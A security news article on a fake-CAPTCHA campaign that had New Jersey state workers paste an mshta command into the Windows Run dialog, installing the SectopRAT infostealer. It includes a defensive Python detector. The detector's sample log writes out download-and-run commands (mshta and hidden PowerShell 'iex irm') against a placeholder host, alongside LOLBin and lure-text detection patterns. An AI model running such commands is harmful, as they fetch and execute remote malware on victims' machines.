Fake CAPTCHA Forces Users to Run Malware Disguised as Verification Text

CN
1 day ago

Cybersecurity analysts in New Jersey flagged an alarming malware scheme this week targeting government employees through fraudulent CAPTCHA challenges. The New Jersey Cybersecurity and Communications Integration Cell (NJCCIC) revealed on March 20 that the attackers sent emails to state workers containing links to deceptive or compromised websites posing as security checks. According to NJCCIC:

The emails contain links directing targets to malicious or compromised websites and prompting deceptive CAPTCHA verification challenges.

These challenges were designed to fool users into running dangerous commands that secretly installed the SectopRAT infostealer.

The method was particularly sophisticated, using a clipboard-based trick to conceal its intent. Victims who clicked the link landed on a fake CAPTCHA page whose script silently copied a command to the clipboard. The page then instructed them to open the Windows Run dialog (Win+R) and paste the clipboard contents as a supposed verification step. The pasted text ended with what read like a harmless status message, "I am not a robot – reCAPTCHA Verification ID: ####", but the text in front of it was a command that launched mshta.exe, a legitimate, Microsoft-signed Windows binary (the Microsoft HTML Application host). Pointed at a URL, mshta.exe fetches the remote content and executes it as an HTML Application regardless of the file extension in the URL, which is why the payload could be disguised as a common file type and still run.
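The chain described above leaves a distinctive process-creation signature: a living-off-the-land binary such as mshta.exe spawned by explorer.exe (the parent of anything launched from the Run dialog), with a remote URL and the reassuring "I am not a robot" comment on its command line. The detection logic below is an added example written for this article, not code from NJCCIC or from the campaign. It assumes a constructed `Key=Value|Key=Value` record layout that mirrors the ParentImage, Image and CommandLine fields of a Sysmon process-creation event; the LOLBin list, the lure strings and the sample records (using the reserved name example.invalid) are illustrative choices, not indicators taken from the advisory.

```python
import re
from dataclasses import dataclass

# Living-off-the-land binaries that fake-CAPTCHA lures commonly paste into Run.
# Illustrative set for this example, not a list published by NJCCIC.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "curl.exe", "msiexec.exe", "rundll32.exe"}

# Reassuring text the lure appends so the pasted command looks like a status line.
LURE_RE = re.compile(r"i am not a robot|recaptcha\s+verification", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one 'Key=Value|Key=Value' record.

    The record layout is constructed for this example; it mirrors the
    ParentImage / Image / CommandLine fields of Sysmon Event ID 1.
    """
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the indicators that fired for this event, in a fixed order."""
    hits = []
    if basename(ev.image) in LOLBINS:
        hits.append("lolbin")
        # A command pasted into the Run dialog is spawned by explorer.exe.
        if basename(ev.parent_image) == "explorer.exe":
            hits.append("explorer-parent")
    if URL_RE.search(ev.command_line):
        hits.append("remote-url")
    if LURE_RE.search(ev.command_line):
        hits.append("lure-text")
    return hits


def is_clickfix(hits: list[str]) -> bool:
    """Lure text alone is decisive: no legitimate command line carries it.

    Without it, require LOLBin + explorer.exe parent + remote URL together,
    so an admin running mshta on a local .hta file is not flagged.
    """
    return "lure-text" in hits or {"lolbin", "explorer-parent", "remote-url"} <= set(hits)


def scan(lines):
    """Return (command_line, indicators) for each record matching the pattern."""
    flagged = []
    for line in lines:
        ev = parse_event(line)
        hits = score_event(ev)
        if is_clickfix(hits):
            flagged.append((ev.command_line, hits))
    return flagged


# Constructed sample records (not from a real capture); example.invalid is a reserved name.
SAMPLE_LOG = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe"
    r"|CommandLine=mshta https://example.invalid/verify # I am not a robot - reCAPTCHA Verification ID: 7391",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe"
    r"|CommandLine=notepad C:\Users\alice\notes.txt",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
    r"|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta C:\Tools\report.hta",
    r"ParentImage=C:\Windows\explorer.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r'|CommandLine=powershell -w hidden -c "iex (irm https://example.invalid/x)"',
]

if __name__ == "__main__":
    # Expected: the mshta lure and the hidden PowerShell download are flagged;
    # notepad and the Outlook-launched local .hta are not.
    for cmd, hits in scan(SAMPLE_LOG):
        print(f"ALERT [{', '.join(hits)}]: {cmd}")
```

The same pasted command also survives on the endpoint: the Run dialog records its history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so an entry there containing mshta and a URL corroborates a process-creation alert during incident response even if the child process has already exited.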

NJCCIC traced the campaign to compromised sites that used widely adopted tools: “Further analysis indicated that the identified compromised websites used technologies such as the WordPress Content Management System (CMS) platform and JavaScript Libraries.”

The investigation also uncovered a supply chain component: auto dealership websites were affected through a compromised third-party video service, so visitors to those sites risked being infected with the same infostealer. Meanwhile, cybersecurity researchers documented related operations distributing other malware types:

Researchers also discovered similar fake CAPTCHA malware campaigns deploying Lumma and Vidar infostealers and stealthy rootkits. Legitimate CAPTCHA verification challenges validate a user’s identity and do not require users to copy and paste commands or output into a Windows Run dialog box.

Officials advised system administrators to update software, strengthen CMS credentials, and report incidents to the FBI’s Internet Crime Complaint Center and NJCCIC.
